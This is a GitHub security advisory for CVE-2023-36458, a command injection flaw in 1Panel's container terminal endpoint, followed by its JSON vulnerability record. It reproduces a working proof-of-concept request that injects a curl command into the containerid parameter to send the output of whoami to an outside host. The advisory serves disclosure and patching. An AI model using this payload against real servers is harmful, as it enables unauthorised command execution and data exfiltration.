ghsa-7x2c-fgx6-xf9h
Vulnerability from github
Impact
The authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal.
- Vulnerability analysis.
backend\app\api\v1\terminal.go#ContainerWsSsh
- vulnerability reproduction.
GET /api/v1/containers/exec?cols=80&rows=24&containerid=/bin/bash||curl%20http://192.168.109.1:12345/`whoami`||&user=asd&command=/bin/bash HTTP/1.1
Host: 192.168.109.152:40982
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Sec-WebSocket-Version: 13
Origin: http://192.168.109.152:40982
Sec-WebSocket-Key: cOEWTRgkjxVppuhzAfOUWQ==
Connection: keep-alive, Upgrade
Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
- The successful execution of system commands.
Affected versions: <= 1.3.5
Patches
The vulnerability has been fixed in v1.3.6.
Workarounds
It is recommended to upgrade the version to v1.3.6.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/1Panel-dev/1Panel Email us at wanghe@fit2cloud.com
{ "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/1Panel-dev/1Panel" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.6" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2023-36458" ], "database_specific": { "cwe_ids": [ "CWE-77" ], "github_reviewed": true, "github_reviewed_at": "2023-07-05T21:38:53Z", "nvd_published_at": "2023-07-05T21:15:09Z", "severity": "MODERATE" }, "details": "### Impact\n\nThe authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal.\n\n1. Vulnerability analysis.\n\n```\nbackend\\app\\api\\v1\\terminal.go#ContainerWsSsh\n```\n\n\n2. vulnerability reproduction.\n\n```\nGET /api/v1/containers/exec?cols=80\u0026rows=24\u0026containerid=/bin/bash||curl%20http://192.168.109.1:12345/`whoami`||\u0026user=asd\u0026command=/bin/bash HTTP/1.1\nHost: 192.168.109.152:40982\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nSec-WebSocket-Version: 13\nOrigin: http://192.168.109.152:40982\nSec-WebSocket-Key: cOEWTRgkjxVppuhzAfOUWQ==\nConnection: keep-alive, Upgrade\nCookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e\nPragma: no-cache\nCache-Control: no-cache\nUpgrade: websocket\n```\n\n3. The successful execution of system commands.\n\n\nAffected versions: \u003c= 1.3.5\n\n### Patches\n\nThe vulnerability has been fixed in v1.3.6.\n\n### Workarounds\n\nIt is recommended to upgrade the version to v1.3.6.\n\n### References\n\nIf you have any questions or comments about this advisory:\n\nOpen an issue in https://github.com/1Panel-dev/1Panel\nEmail us at wanghe@fit2cloud.com\n", "id": "GHSA-7x2c-fgx6-xf9h", "modified": "2023-07-07T22:18:09Z", "published": "2023-07-05T21:38:53Z", "references": [ { "type": "WEB", "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-7x2c-fgx6-xf9h" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36458" }, { "type": "PACKAGE", "url": "https://github.com/1Panel-dev/1Panel" }, { "type": "WEB", "url": "https://github.com/1Panel-dev/1Panel/releases/tag/v1.3.6" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "type": "CVSS_V3" } ], "summary": "1Panel vulnerable to command injection when entering the container terminal" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.